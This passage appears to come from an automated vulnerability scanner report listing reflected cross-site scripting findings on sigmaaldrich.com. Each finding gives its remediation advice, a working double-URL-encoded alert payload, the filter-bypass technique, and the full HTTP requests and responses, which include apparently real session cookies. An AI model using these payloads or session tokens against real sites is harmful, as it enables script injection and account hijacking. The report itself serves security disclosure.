Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai194be";alert(1)//42d1ed28fc9/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.114. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a940b%2522%253balert%25281%2529%252f%252f35484a5d8b1 was submitted in the REST URL parameter 6. This input was echoed as a940b";alert(1)//35484a5d8b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrnaa940b%2522%253balert%25281%2529%252f%252f35484a5d8b1/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrnaa940b";alert(1)//35484a5d8b1/custom-services","E404") ;
   </script>
...[SNIP]...

1.115. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19f8%2522%253balert%25281%2529%252f%252f3ffeaa9c5f6 was submitted in the REST URL parameter 7. This input was echoed as d19f8";alert(1)//3ffeaa9c5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-servicesd19f8%2522%253balert%25281%2529%252f%252f3ffeaa9c5f6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
ript language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-servicesd19f8";alert(1)//3ffeaa9c5f6","E404") ;
   </script>
...[SNIP]...

1.116. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbf39%2522%253balert%25281%2529%252f%252f9d65c2f2df5 was submitted in the REST URL parameter 1. This input was echoed as dbf39";alert(1)//9d65c2f2df5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentdbf39%2522%253balert%25281%2529%252f%252f9d65c2f2df5/sigma-aldrich/areas-of-interest/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentdbf39";alert(1)//9d65c2f2df5/sigma-aldrich/areas-of-interest/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.117. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea4a%2522%253balert%25281%2529%252f%252f269e62f022b was submitted in the REST URL parameter 2. This input was echoed as bea4a";alert(1)//269e62f022b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichbea4a%2522%253balert%25281%2529%252f%252f269e62f022b/areas-of-interest/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:56 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichbea4a";alert(1)//269e62f022b/areas-of-interest/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.118. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c264%2522%253balert%25281%2529%252f%252f84d63a888f4 was submitted in the REST URL parameter 3. This input was echoed as 8c264";alert(1)//84d63a888f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest8c264%2522%253balert%25281%2529%252f%252f84d63a888f4/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
